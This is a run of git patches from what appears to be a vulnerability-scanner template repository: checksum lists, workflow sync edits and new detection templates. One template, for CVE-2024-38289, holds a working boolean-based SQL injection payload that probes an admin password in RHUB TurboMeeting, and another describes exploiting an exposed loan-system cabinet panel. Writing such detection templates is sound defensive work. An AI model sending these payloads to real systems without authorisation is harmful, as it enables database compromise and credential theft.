+http/technologies/wordpress/plugins/wp-mail-smtp.yaml:c467ee5cbfdd02c5adcfa98a7695e5122f9c2d2c +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:48e332cad9a1d19a2aabf67fe98f4ae3adafdbbc +http/technologies/wordpress/plugins/wp-migrate-db.yaml:806081b68fa7cf5077fd49ddc5630c2e2c71fee5 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:c2b7fa89f79127f934f19ea45bb77caef8a80809 +http/technologies/wordpress/plugins/wp-optimize.yaml:0a7ca3353d41c8c3e8b5447a33c39423fce4187f +http/technologies/wordpress/plugins/wp-pagenavi.yaml:c84a6d103d3de849c9ed0555d2ad69c28c1eab9a +http/technologies/wordpress/plugins/wp-reset.yaml:896010702419036225035602aedd392d3350e47c +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e82e8cfc2c9bacad123dd83835d3e962a4414424 +http/technologies/wordpress/plugins/wp-rollback.yaml:3d91677de85deea74983f64d511e1b1493cfc670 +http/technologies/wordpress/plugins/wp-seopress.yaml:da1a42691d0ae6be2fc8d2eaa4647d1f19cab43c +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:11620a242ece44fa6104a9af139a0265b0fb69dd +http/technologies/wordpress/plugins/wp-smushit.yaml:cb1f05141b8da2beab64f4021338330a8d4ddd8d +http/technologies/wordpress/plugins/wp-statistics.yaml:9cb105762cd4672310a48a26249f9ee2c1f9ba7a +http/technologies/wordpress/plugins/wp-super-cache.yaml:76463e3816905d47b9a1ecad6f91c84300906d0d http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3be56d7fb0ddbfcdff606c21ba2eaf1a884c849b +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:6c85af103bde9cb10c025a9302bb6f9613cc84eb +http/technologies/wordpress/plugins/wpforms-lite.yaml:6f3b08859873ef78b2a257fd3cc5d6360c6e4fca +http/technologies/wordpress/plugins/wps-hide-login.yaml:c1bab37bd47f9049452add340af21e656debd1db +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:e629246d07264a041798ed6919cd6f787548381e http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:7d47684a8d95444348f59a10ee1e2be73c6dd06a http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8920,7 +8921,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:d0a78187b729d7b6b5db22840e248510961fae5e +templates-checksum.txt:a11443baf49c7e92f47abc5dec63ee83cf363f44 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 39879046abb01a04dc7cbc28e60c4fe240f3b97a Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 11:31:31 +0000 Subject: [PATCH 1625/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 733d7b9995..42a32f48f0 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'headless/2024/CVE-2024-38526.yaml' - 'http/cnvd/2023/CNVD-2023-72138.yaml' + - 'http/cves/2022/CVE-2022-34267.yaml' - 'http/cves/2022/CVE-2022-38322.yaml' - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-2309.yaml' From 96d17c70b6dc70b610a913d8c8d438bd0a51effb Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 11:32:30 +0000 Subject: [PATCH 1626/1841] Auto Template Signing [Thu Jul 25 11:32:30 UTC 2024] :robot: --- http/cves/2022/CVE-2022-34267.yaml | 1 + http/cves/2024/CVE-2024-37843.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2022/CVE-2022-34267.yaml b/http/cves/2022/CVE-2022-34267.yaml index fb02f69f88..9d3355e8d5 100644 --- a/http/cves/2022/CVE-2022-34267.yaml +++ b/http/cves/2022/CVE-2022-34267.yaml @@ -47,3 +47,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402200e8769d2734c037de9115be5b7a4e32352651fdd297bd38f049b7f80932010710220460901c13962e91d58fa871dcfd5567ec9038743c52998b16807a8354ffe377a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-37843.yaml b/http/cves/2024/CVE-2024-37843.yaml index a51314b770..9248f0419f 100644 --- a/http/cves/2024/CVE-2024-37843.yaml +++ b/http/cves/2024/CVE-2024-37843.yaml @@ -55,3 +55,4 @@ http: part: content_type words: - "application/json" +# digest: 490a00463044022002dca2f2b0925cbe4564e9abdf3f70b914472fcecde703539b7834ad0d4c8aea02207c9493c976a30ef2f6ad0e7be9a8c8edd366b67477a88c89ad7c574e50005def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From cfc4df18aff23445c719dbb1e0abbf2d17604dc2 Mon Sep 17 00:00:00 2001 From: Noel Varghese <77625109+NoelV11@users.noreply.github.com> Date: Thu, 25 Jul 2024 17:10:53 +0530 Subject: [PATCH 1627/1841] Added Template to detect Exposed Instances of RLOS Cabinet Management Panel --- .../detection/RLOS-management-cabinet-detect | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 network/detection/RLOS-management-cabinet-detect diff --git a/network/detection/RLOS-management-cabinet-detect b/network/detection/RLOS-management-cabinet-detect new file mode 100644 index 0000000000..d87ca3ac7c --- /dev/null +++ b/network/detection/RLOS-management-cabinet-detect @@ -0,0 +1,25 @@ +id: rlos-cabinet-detect +info: + name: Exposed Cabinet Management Panel - Retail Loan Origination System + author: noel + severity: Medium + description: Retail Loan Origination Systems,developed by NewGen Software is used to streamline consumer loan origination from banking institutions, with end-to-end automation of loan requests in a paperless environment. A Cabinet Panel is used by an RLOS Service to manage storage volumes, that in turn store documents, containing customer PII submitted through the webapp. The RLOS Web Application is deployed on a special service subdomain on of the client's domain infrastructure - with the suffix “rlos" (for example - rlos.company.com) . The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port + impact: | + An attacker can deploy foreign application server instances on the panel using breached credentials for the subdomain, access information about the volume storage and escalate the misconfiguration, by de-registering existing storage systems, so as to route all documents submitted through the platform on an adversary-controlled application server, potentially leading to further compromise. + metadata: + verified: true + tags: info,detection +http: + - method: GET + path: + - '{{BaseURL}}/omniapp/pages/cabinet/managecabinet.jsf?Action=1' + - '{{BaseURL}}' + stop-at-first-match: false + matchers-condition: and + matchers: + - type: word + words: + - 'Manage Cabinet [Register Cabinet]' + - type: status + status: + - 200 \ No newline at end of file From 20b4dff4df1d93054c6107d3965bf6ab7fbb4765 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 25 Jul 2024 17:31:51 +0530 Subject: [PATCH 1628/1841] Create CVE-2024-38289.yaml --- http/cves/2024/CVE-2024-38289.yaml | 43 ++++++++++++++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/cves/2024/CVE-2024-38289.yaml diff --git a/http/cves/2024/CVE-2024-38289.yaml b/http/cves/2024/CVE-2024-38289.yaml new file mode 100644 index 0000000000..81ad678b22 --- /dev/null +++ b/http/cves/2024/CVE-2024-38289.yaml @@ -0,0 +1,43 @@ +id: CVE-2024-38289 + +info: + name: TurboMeeting - Boolean-based SQL Injection + author: rootxharsh,iamnoooob,pdresearch + severity: critical + description: | + A Boolean-based SQL injection vulnerability in the "RHUB TurboMeeting" web application. This vulnerability could allow an attacker to execute arbitrary SQL commands on the database server, potentially allowing them to access sensitive data or compromise the server. + reference: + - https://github.com/google/security-research/security/advisories/GHSA-vx5j-8pgx-v42v + metadata: + verified: true + max-request: 2 + shodan-query: html:"TurboMeeting" + tags: cve,cve2024,sqli,turbomeeting + +http: + - raw: + - | + POST /as/wapi/vmp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + meeting_id=1'/**/OR/**/1=1/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** + + - | + POST /as/wapi/vmp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + meeting_id=1'/**/OR/**/1=2/**/UNION/**/select/**/password/**/from/**/employee/**/where/**/email='admin'/**/AND/**/substr(password,2,1)='b'/** + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - '<__Status__>SUCCEED</__Status__>' + + - type: word + part: body_2 + words: + - '<__Status__>FAILED</__Status__>' From 67842aecf81551928ed4b8063fc2a06ac4887369 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 25 Jul 2024 17:47:42 +0530 Subject: [PATCH 1629/1841] Update and rename RLOS-management-cabinet-detect to manage-cabinet-register.yaml --- .../manage-cabinet-register.yaml | 31 +++++++++++++++++++ .../detection/RLOS-management-cabinet-detect | 25 --------------- 2 files changed, 31 insertions(+), 25 deletions(-) create mode 100644 http/misconfiguration/manage-cabinet-register.yaml delete mode 100644 network/detection/RLOS-management-cabinet-detect diff --git a/http/misconfiguration/manage-cabinet-register.yaml b/http/misconfiguration/manage-cabinet-register.yaml new file mode 100644 index 0000000000..63dbd7137c --- /dev/null +++ b/http/misconfiguration/manage-cabinet-register.yaml @@ -0,0 +1,31 @@ +id: manage-cabinet-register + +info: + name: Manage Cabinet Register - Exposed + author: noel + severity: medium + description: | + The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port + reference: + - https://www.edms-consultants.com/newgen-rlos/ + metadata: + verified: true + shodan-query: html:"omniapp" + max-request: 1 + tags: misconfig,cabinet,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/omniapp/pages/cabinet/managecabinet.jsf?Action=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Manage Cabinet [Register Cabinet]' + + - type: status + status: + - 200 diff --git a/network/detection/RLOS-management-cabinet-detect b/network/detection/RLOS-management-cabinet-detect deleted file mode 100644 index d87ca3ac7c..0000000000 --- a/network/detection/RLOS-management-cabinet-detect +++ /dev/null @@ -1,25 +0,0 @@ -id: rlos-cabinet-detect -info: - name: Exposed Cabinet Management Panel - Retail Loan Origination System - author: noel - severity: Medium - description: Retail Loan Origination Systems,developed by NewGen Software is used to streamline consumer loan origination from banking institutions, with end-to-end automation of loan requests in a paperless environment. A Cabinet Panel is used by an RLOS Service to manage storage volumes, that in turn store documents, containing customer PII submitted through the webapp. The RLOS Web Application is deployed on a special service subdomain on of the client's domain infrastructure - with the suffix “rlos" (for example - rlos.company.com) . The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port - impact: | - An attacker can deploy foreign application server instances on the panel using breached credentials for the subdomain, access information about the volume storage and escalate the misconfiguration, by de-registering existing storage systems, so as to route all documents submitted through the platform on an adversary-controlled application server, potentially leading to further compromise. - metadata: - verified: true - tags: info,detection -http: - - method: GET - path: - - '{{BaseURL}}/omniapp/pages/cabinet/managecabinet.jsf?Action=1' - - '{{BaseURL}}' - stop-at-first-match: false - matchers-condition: and - matchers: - - type: word - words: - - 'Manage Cabinet [Register Cabinet]' - - type: status - status: - - 200 \ No newline at end of file From e634ba9f73023236f8943d18667354cabe9c07e7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 25 Jul 2024 17:51:19 +0530 Subject: [PATCH 1630/1841] fix lint error --- http/misconfiguration/manage-cabinet-register.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/http/misconfiguration/manage-cabinet-register.yaml b/http/misconfiguration/manage-cabinet-register.yaml index 63dbd7137c..df2ca3a58a 100644 --- a/http/misconfiguration/manage-cabinet-register.yaml +++ b/http/misconfiguration/manage-cabinet-register.yaml @@ -7,12 +7,12 @@ info: description: | The path to the Cabinet Storage is omniapp/pages/cabinet/managecabinet.jsf?Action=1. If exposed, it gives an attacker insight into information such as Storage Volume Name, Cabinet Name, it's alias, Deployed AppServer IP Address and Port reference: - - https://www.edms-consultants.com/newgen-rlos/ + - https://www.edms-consultants.com/newgen-rlos/ metadata: - verified: true - shodan-query: html:"omniapp" - max-request: 1 - tags: misconfig,cabinet,exposure + verified: true + shodan-query: html:"omniapp" + max-request: 1 + tags: misconfig,cabinet,exposure http: - method: GET From 269682cfada70e0fc35a38fd223cfa1c8c197d5f Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:27:18 +0000 Subject: [PATCH 1631/1841] Auto Generated New Template Addition List [Thu Jul 25 12:27:18 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 07ab07acb5..f219241598 100644 --- a/.new-additions +++ b/.new-additions @@ -54,6 +54,7 @@ http/vulnerabilities/other/jan-file-upload.yaml http/vulnerabilities/other/lvs-download-lfi.yaml http/vulnerabilities/other/ncast-lfi.yaml http/vulnerabilities/other/wifisky7-rce.yaml +network/c2/7777botnet.yaml network/cves/2024/CVE-2024-6746.yaml vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml workflows/nacos-workflow.yaml From bd4f54dd928e185298cc83c8136756cece92e2d9 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:27:29 +0000 Subject: [PATCH 1632/1841] Auto Generated Templates Checksum [Thu Jul 25 12:27:29 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 8b1a6cbc09..c52c80d9f6 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2840,7 +2840,7 @@ http/cves/2022/CVE-2022-34049.yaml:50c3e971603a6b6b59cf47ea353d59db6ce9a94e http/cves/2022/CVE-2022-34093.yaml:507d9374130389cd1aec5b58c6adb274020e93c7 http/cves/2022/CVE-2022-34094.yaml:532360cc425c43471f60b0c3a4668b2b416ba392 http/cves/2022/CVE-2022-34121.yaml:dbea363aeb740fe3e7119e4e1fdb4a7c39c07d28 -http/cves/2022/CVE-2022-34267.yaml:3691097ede913720b5bc51c659d650422424bce8 +http/cves/2022/CVE-2022-34267.yaml:41e87277f9e9fc26caf73ae8b224dc02e04fe66e http/cves/2022/CVE-2022-34328.yaml:bcf3e8505f0ea0d20573124187336e6991c961aa http/cves/2022/CVE-2022-34534.yaml:2bbe4596a2683f6464b9c40222fdd20c944edc8e http/cves/2022/CVE-2022-34576.yaml:c9eb8acdc06081e67f0d7f015281f30f203eea51 @@ -3497,7 +3497,7 @@ http/cves/2024/CVE-2024-37032.yaml:098e78c2cfc97aee7b9e22ff34101e609f023cc2 http/cves/2024/CVE-2024-37152.yaml:45b7e5ca110853fe4cca80588d33d140f611d1e2 http/cves/2024/CVE-2024-37393.yaml:c7cac02b06ca12c407122ea2fff033456006d7dd http/cves/2024/CVE-2024-3742.yaml:c14a1c00e621d1d77ddf978af6680fc4b05c3aa1 -http/cves/2024/CVE-2024-37843.yaml:dc881e4de411f052173b23a79404997dd5f16e7f +http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb http/cves/2024/CVE-2024-3822.yaml:2dd9c56b09c0619afb49b80cbcb5979b3eae5a1c http/cves/2024/CVE-2024-3922.yaml:768a5cb24e6893fee27193eda765eeeaedae2a21 @@ -8740,6 +8740,7 @@ javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea4 javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 +network/c2/7777botnet.yaml:11c2a891e3476084e18a8079b1b512caa4bf63c6 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 network/c2/orcus-rat-trojan.yaml:391539519819acb2999e30b98fbd9d789c6395ae @@ -8921,7 +8922,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:a11443baf49c7e92f47abc5dec63ee83cf363f44 +templates-checksum.txt:0e5333c863342e333fb7ef3ff11ffa795c92ddca vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 52575cfee1530f0dcd95a5f9bf90ccd630243e74 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:28:08 +0000 Subject: [PATCH 1633/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 42a32f48f0..00cfbb4ad3 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -59,6 +59,7 @@ on: - 'http/vulnerabilities/other/lvs-download-lfi.yaml' - 'http/vulnerabilities/other/ncast-lfi.yaml' - 'http/vulnerabilities/other/wifisky7-rce.yaml' + - 'network/c2/7777botnet.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' - 'vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml' - 'workflows/nacos-workflow.yaml' From 276ca199e4f48e811071d13bd1d800785d320c95 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:28:13 +0000 Subject: [PATCH 1634/1841] Auto Generated New Template Addition List [Thu Jul 25 12:28:13 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index f219241598..0a47764379 100644 --- a/.new-additions +++ b/.new-additions @@ -45,6 +45,7 @@ http/misconfiguration/installer/freshrss-installer.yaml http/misconfiguration/mongod-exposure.yaml http/misconfiguration/servicenow-title-injection.yaml http/misconfiguration/sftpgo-admin-setup.yaml +http/technologies/apache/apache-gravitino-detect.yaml http/technologies/apache/apache-ozone-detect.yaml http/technologies/wordpress/plugins/fluent-smtp.yaml http/technologies/wordpress/plugins/wp-crontrol.yaml From eacb40ab4268dd8bc95c4cfb7aa59ee9b3c245ca Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:28:20 +0000 Subject: [PATCH 1635/1841] Auto Generated Templates Checksum [Thu Jul 25 12:28:20 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c52c80d9f6..7a6f85df36 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -6930,6 +6930,7 @@ http/technologies/apache/apache-cloudstack-detect.yaml:c08888a73f19a2dd082a7a928 http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495 http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507 http/technologies/apache/apache-dubbo-detect.yaml:454eb1d29924d2b5f4a9f6765d3062646950f91a +http/technologies/apache/apache-gravitino-detect.yaml:c5e665af574d1cc4315d9869bc09ecc1ed727f69 http/technologies/apache/apache-guacamole.yaml:8c7975c569769ee074f51307e0d963b816e631aa http/technologies/apache/apache-karaf-panel.yaml:50fa0b20105a0786c5ce5ddce7aa5c49237bfafa http/technologies/apache/apache-ozone-detect.yaml:a06d145bb51dd1d87c14bc151843fdf8c5ef7285 @@ -8922,7 +8923,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0e5333c863342e333fb7ef3ff11ffa795c92ddca +templates-checksum.txt:1d2ccccbc06f9da5765fb10d93cc70e2235cc08b vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 8bf46ccaf9046f9f42ada5e19c6e30ca17d49582 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:29:07 +0000 Subject: [PATCH 1636/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 00cfbb4ad3..a7b912601a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -50,6 +50,7 @@ on: - 'http/misconfiguration/mongod-exposure.yaml' - 'http/misconfiguration/servicenow-title-injection.yaml' - 'http/misconfiguration/sftpgo-admin-setup.yaml' + - 'http/technologies/apache/apache-gravitino-detect.yaml' - 'http/technologies/apache/apache-ozone-detect.yaml' - 'http/technologies/wordpress/plugins/fluent-smtp.yaml' - 'http/technologies/wordpress/plugins/wp-crontrol.yaml' From 6e2109f62f9664b9fdea69cdbc6c9c7c0c4d3a4e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:29:08 +0000 Subject: [PATCH 1637/1841] Auto Template Signing [Thu Jul 25 12:29:08 UTC 2024] :robot: --- network/c2/7777botnet.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/c2/7777botnet.yaml b/network/c2/7777botnet.yaml index fce490d510..e75e576fae 100644 --- a/network/c2/7777botnet.yaml +++ b/network/c2/7777botnet.yaml @@ -28,3 +28,4 @@ tcp: - "xlog" - "in" condition: and +# digest: 4b0a00483046022100e357f37402bb259b1f286493d649e53d2a2e4e63432ecdfda050ca7fefdbc79e022100ed45eca12e16c502eaef471e531aa28c7956d7ce19ec741ab5decdbe410d467f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 2e76d6e756b22d7c5f9f80e364d6d1c93ec8e8fa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:49:16 +0000 Subject: [PATCH 1639/1841] Auto Generated Templates Checksum [Thu Jul 25 12:49:16 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 7a6f85df36..552a075591 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -249,7 +249,7 @@ dast/vulnerabilities/ssrf/response-ssrf.yaml:104def6ff82e4dcfc88917f98403bea903e dast/vulnerabilities/ssti/reflection-ssti.yaml:cfefbcfec9ce4e1de812f0409c4a2461a4a7b851 dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:46717ee593fe9809385572b82e9b1a7265c3cf6f -dast/vulnerabilities/xxe/generic-xxe.yaml:c0dfcc8fa1d2879f2985806eff40727036cdf51a +dast/vulnerabilities/xxe/generic-xxe.yaml:6b0d9de54a6fd786acccd9b247da23b36ea0ccf0 dns/azure-takeover-detection.yaml:5295c90a6fa66f513eca7f6f30eee8745a41aa0a dns/bimi-detect.yaml:bde903bfbcd370747978534ce2391131b12b08f0 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 @@ -8741,7 +8741,7 @@ javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea4 javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 javascript/udp/detection/tftp-detect.yaml:983f405d3c4b95ad9114371625cab9cdf8e28032 network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 -network/c2/7777botnet.yaml:11c2a891e3476084e18a8079b1b512caa4bf63c6 +network/c2/7777botnet.yaml:35a2e313d6ac2cc06e061282308083ad0e3c9964 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 network/c2/orcus-rat-trojan.yaml:391539519819acb2999e30b98fbd9d789c6395ae @@ -8923,7 +8923,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1d2ccccbc06f9da5765fb10d93cc70e2235cc08b +templates-checksum.txt:bfc5659d46618f3685f0003bd0c2479905b58c67 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 9d604a14960ccfbe83d1034a11de06323853f0c6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 25 Jul 2024 12:49:56 +0000 Subject: [PATCH 1640/1841] Auto Generated New Template Addition List [Thu Jul 25 12:49:55 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 0a47764379..3f072f024e 100644 --- a/.new-additions +++ b/.new-additions @@ -17,6 +17,7 @@ http/cves/2024/CVE-2024-34257.yaml http/cves/2024/CVE-2024-34351.yaml http/cves/2024/CVE-2024-3742.yaml http/cves/2024/CVE-2024-37843.yaml +http/cves/2024/CVE-2024-39250.yaml http/cves/2024/CVE-2024-40348.yaml http/cves/2024/CVE-2024-4257.yaml http/cves/2024/CVE-2024-4295.yaml From 4a4f9e93a6c12361d327fcc0c758b3dc25ed8c8f Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 25 Jul 2024 12:50:07 +0000 Subject: [PATCH 1641/1841] Auto Generated Templates Checksum [Thu Jul 25 12:50:07 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 552a075591..86a6700e31 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3501,6 +3501,7 @@ http/cves/2024/CVE-2024-37843.yaml:bc236163373e7c3621139f152cb99b39b9a231c7 http/cves/2024/CVE-2024-37881.yaml:060af3bf51e4ab05684d4923658d02b3c49583bb 